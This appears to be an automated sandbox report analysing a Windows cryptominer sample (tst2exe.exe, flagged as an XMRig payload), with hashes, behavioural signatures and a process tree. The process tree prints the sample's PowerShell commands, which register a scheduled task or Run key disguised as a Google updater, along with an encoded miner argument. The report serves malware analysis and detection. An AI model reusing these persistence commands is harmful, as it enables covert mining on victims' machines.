Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
01/07/2023, 08:17
Static task
static1
Behavioral task
behavioral1
Sample
tst2exe.exe
Resource
win7-20230621-en
General
-
Target
tst2exe.exe
-
Size
2.0MB
-
MD5
092d064fa7c8b7c292462d00eb149265
-
SHA1
0d49c50765b8bf2b4204e879a7be4cc26687f067
-
SHA256
c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136
-
SHA512
4f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e
-
SSDEEP
49152:x4PS8H+0oebhaupXOZcifTeCv31EMFvxbcS32paotG:xl8e0oebgE0xEYAHpa0
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 2012 created 1284 2012 tst2exe.exe 16 PID 2012 created 1284 2012 tst2exe.exe 16 PID 1536 created 1284 1536 updater.exe 16 PID 1536 created 1284 1536 updater.exe 16 PID 1536 created 1284 1536 updater.exe 16 PID 1672 created 1284 1672 conhost.exe 16 PID 1536 created 1284 1536 updater.exe 16 -
XMRig Miner payload 15 IoCs
resource yara_rule behavioral1/memory/2040-93-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-97-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-112-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2040-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1536 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 1192 taskeng.exe -
resource yara_rule behavioral1/memory/2040-93-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-97-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-112-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2040-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1536 set thread context of 1672 1536 updater.exe 39 PID 1536 set thread context of 2040 1536 updater.exe 46 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1408 schtasks.exe 568 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1544 WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2012 tst2exe.exe 2012 tst2exe.exe 2024 powershell.exe 2012 tst2exe.exe 2012 tst2exe.exe 1268 powershell.exe 1536 updater.exe 1536 updater.exe 932 powershell.exe 1536 updater.exe 1536 updater.exe 1536 updater.exe 1536 updater.exe 1672 conhost.exe 1672 conhost.exe 1536 updater.exe 1536 updater.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe 2040 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 932 powershell.exe Token: SeIncreaseQuotaPrivilege 1544 WMIC.exe Token: SeSecurityPrivilege 1544 WMIC.exe Token: SeTakeOwnershipPrivilege 1544 WMIC.exe Token: SeLoadDriverPrivilege 1544 WMIC.exe Token: SeSystemProfilePrivilege 1544 WMIC.exe Token: SeSystemtimePrivilege 1544 WMIC.exe Token: SeProfSingleProcessPrivilege 1544 WMIC.exe Token: SeIncBasePriorityPrivilege 1544 WMIC.exe Token: SeCreatePagefilePrivilege 1544 WMIC.exe Token: SeBackupPrivilege 1544 WMIC.exe Token: SeRestorePrivilege 1544 WMIC.exe Token: SeShutdownPrivilege 1544 WMIC.exe Token: SeDebugPrivilege 1544 WMIC.exe Token: SeSystemEnvironmentPrivilege 1544 WMIC.exe Token: SeRemoteShutdownPrivilege 1544 WMIC.exe Token: SeUndockPrivilege 1544 WMIC.exe Token: SeManageVolumePrivilege 1544 WMIC.exe Token: 33 1544 WMIC.exe Token: 34 1544 WMIC.exe Token: 35 1544 WMIC.exe Token: SeIncreaseQuotaPrivilege 1544 WMIC.exe Token: SeSecurityPrivilege 1544 WMIC.exe Token: SeTakeOwnershipPrivilege 1544 WMIC.exe Token: SeLoadDriverPrivilege 1544 WMIC.exe Token: SeSystemProfilePrivilege 1544 WMIC.exe Token: SeSystemtimePrivilege 1544 WMIC.exe Token: SeProfSingleProcessPrivilege 1544 WMIC.exe Token: SeIncBasePriorityPrivilege 1544 WMIC.exe Token: SeCreatePagefilePrivilege 1544 WMIC.exe Token: SeBackupPrivilege 1544 WMIC.exe Token: SeRestorePrivilege 1544 WMIC.exe Token: SeShutdownPrivilege 1544 WMIC.exe Token: SeDebugPrivilege 1544 WMIC.exe Token: SeSystemEnvironmentPrivilege 1544 WMIC.exe Token: SeRemoteShutdownPrivilege 1544 WMIC.exe Token: SeUndockPrivilege 1544 WMIC.exe Token: SeManageVolumePrivilege 1544 WMIC.exe Token: 33 1544 WMIC.exe Token: 34 1544 WMIC.exe Token: 35 1544 WMIC.exe Token: SeLockMemoryPrivilege 2040 conhost.exe Token: SeLockMemoryPrivilege 2040 conhost.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 2024 wrote to memory of 1408 2024 powershell.exe 30 PID 2024 wrote to memory of 1408 2024 powershell.exe 30 PID 2024 wrote to memory of 1408 2024 powershell.exe 30 PID 1268 wrote to memory of 764 1268 powershell.exe 33 PID 1268 wrote to memory of 764 1268 powershell.exe 33 PID 1268 wrote to memory of 764 1268 powershell.exe 33 PID 1192 wrote to memory of 1536 1192 taskeng.exe 35 PID 1192 wrote to memory of 1536 1192 taskeng.exe 35 PID 1192 wrote to memory of 1536 1192 taskeng.exe 35 PID 932 wrote to memory of 568 932 powershell.exe 38 PID 932 wrote to memory of 568 932 powershell.exe 38 PID 932 wrote to memory of 568 932 powershell.exe 38 PID 1536 wrote to memory of 1672 1536 updater.exe 39 PID 1532 wrote to memory of 1544 1532 cmd.exe 44 PID 1532 wrote to memory of 1544 1532 cmd.exe 44 PID 1532 wrote to memory of 1544 1532 cmd.exe 44 PID 1536 wrote to memory of 2040 1536 updater.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\tst2exe.exe"C:\Users\Admin\AppData\Local\Temp\tst2exe.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lzkcwj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:1408
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rjzfniou#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:764
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lzkcwj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:568
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe spvjclcofsaeha2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1672
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵PID:820
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ykvqwkwpmylrdfhc 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y8p6xe1bGyOY+8Z8xp48QJueDeTETxFigw/gLPZY+zEogUGWJwIe0AnFUo5KGehIuSRD8LakQ2BzY76sQikKRo5YsnCeK/QrMiYGenOchYS4YVm4Mq5GFwkjpX187BgTPg4kGQ/EJj38iB/3as3g5YhZ2bIdgdbaAHvylGhfZzDs8Fdzbj5yoefwc1PUgVtZcrx8AO08U/BUNOX4d1V0IyrQP5B20AcwQFEf3x0sDlsF6RTUzvnwHQcaaeDuk/unYLnfvKkZUjZW8X97DPoFq76llU4OHP3lJptyeI4kahtNiTtYEa0YgdIy3fkqHhgulxBWEv3BRfJvESPAcrtIeoICy32EkyJ0srxUpK9t9omwK3rwfIP/Gc40evP+iApMQO2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E868B500-DEA7-4DAC-BE25-6C2CB5DDA50B} S-1-5-21-1306246566-3334493410-3785284834-1000:FQMLBKKW\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1536
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5092d064fa7c8b7c292462d00eb149265
SHA10d49c50765b8bf2b4204e879a7be4cc26687f067
SHA256c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136
SHA5124f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e
-
Filesize
2.0MB
MD5092d064fa7c8b7c292462d00eb149265
SHA10d49c50765b8bf2b4204e879a7be4cc26687f067
SHA256c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136
SHA5124f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD531e36325c0ce7b1d6986ba2efbc65e54
SHA1b54fd50ad8404006fbdfd9979092ae83638c1c41
SHA256a50116c628a7a7686a29ec0a3283baaedfa7dbab7f4a02a61a8d6b9347a7e401
SHA5123b6b924f8b8e7abdee8d7ca10af7471727bce096727b97b493ae18e96399bbc6e4d0fb2700e9241168de950c325acf71c092652fbf37e578d33e57f0a50c0df1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD531e36325c0ce7b1d6986ba2efbc65e54
SHA1b54fd50ad8404006fbdfd9979092ae83638c1c41
SHA256a50116c628a7a7686a29ec0a3283baaedfa7dbab7f4a02a61a8d6b9347a7e401
SHA5123b6b924f8b8e7abdee8d7ca10af7471727bce096727b97b493ae18e96399bbc6e4d0fb2700e9241168de950c325acf71c092652fbf37e578d33e57f0a50c0df1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\85TJ2MK1K3TTJ7AYDBEY.temp
Filesize7KB
MD531e36325c0ce7b1d6986ba2efbc65e54
SHA1b54fd50ad8404006fbdfd9979092ae83638c1c41
SHA256a50116c628a7a7686a29ec0a3283baaedfa7dbab7f4a02a61a8d6b9347a7e401
SHA5123b6b924f8b8e7abdee8d7ca10af7471727bce096727b97b493ae18e96399bbc6e4d0fb2700e9241168de950c325acf71c092652fbf37e578d33e57f0a50c0df1
-
Filesize
2.0MB
MD5092d064fa7c8b7c292462d00eb149265
SHA10d49c50765b8bf2b4204e879a7be4cc26687f067
SHA256c295fd06c87d51ea44008eada1aebdf83b796d84110d0c887b30dd1f3f042136
SHA5124f48809cdc50e36347d9b4d212e9275763a3e35ddd503f3f1e3571a8375fc42340fb39c9049a3d4671944e75f113c4dfc725fc47e549316693065c0a233da93e